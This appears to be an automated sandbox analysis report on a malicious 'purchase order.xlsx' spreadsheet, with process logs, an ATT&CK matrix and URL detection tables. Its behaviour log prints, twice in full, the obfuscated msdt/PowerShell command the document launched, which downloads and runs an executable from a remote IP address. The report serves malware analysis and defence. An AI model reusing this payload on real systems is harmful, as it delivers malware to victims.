        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 812Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dllJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		Path Interception11
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Application Window Discovery        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Non-Application Layer Protocol        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts12
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        Extra Window Memory Injection        		1
        Disable or Modify Tools        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
        Application Layer Protocol        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager13
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
        Ingress Tool Transfer        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Extra Window Memory Injection        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        purchase order.xlsx17%ReversingLabsDocument-Office.Exploit.CVE-2017-0199

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll0%ReversingLabs
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        http://172.245.119.48/870/vbc.exe0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        http://172.245.119.48/shipping_invc/document.html0%Avira URL Cloudsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://172.245.119.48/870/vbc.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://172.245.119.48/shipping_invc/document.htmlfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
          		high
          https://login.microsoftonline.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
            		high
            https://shell.suite.office.com:144334C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
              		high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                		high
                https://autodiscover-s.outlook.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                  		high
                  https://roaming.edog.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                    		high
                    https://cdn.entity.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.addins.omex.office.net/appinfo/query34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                      		high
                      https://clients.config.office.net/user/v1.0/tenantassociationkey34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                        		high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          		high
                          https://powerlift.acompli.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://lookup.onenote.com/lookup/geolocation/v134C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                            		high
                            https://cortana.ai34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                              		high
                              https://cloudfiles.onenote.com/upload.aspx34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                		high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                  		high
                                  https://entitlement.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                    		high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      		high
                                      https://api.aadrm.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                        		high
                                        https://api.microsoftstream.com/api/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                            		high
                                            https://cr.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                              		high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://portal.office.com/account/?ref=ClientMeControl34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.aadrm.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            		high
                                                            https://dev0-api.acompli.net/autodetect34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.ms34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.diagnosticssdf.office.com/v2/feedback34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                              		high
                                                              https://api.powerbi.com/v1.0/myorg/groups34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                		high
                                                                https://web.microsoftstream.com/video/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                  		high
                                                                  https://api.addins.store.officeppe.com/addinstemplate34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://graph.windows.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    		high
                                                                    https://dataservice.o365filtering.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://officesetup.getmicrosoftkey.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://analysis.windows.net/powerbi/api34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                      		high
                                                                      https://prod-global-autodetect.acompli.net/autodetect34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                        		high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                          		high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                            		high
                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                              		high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                		high
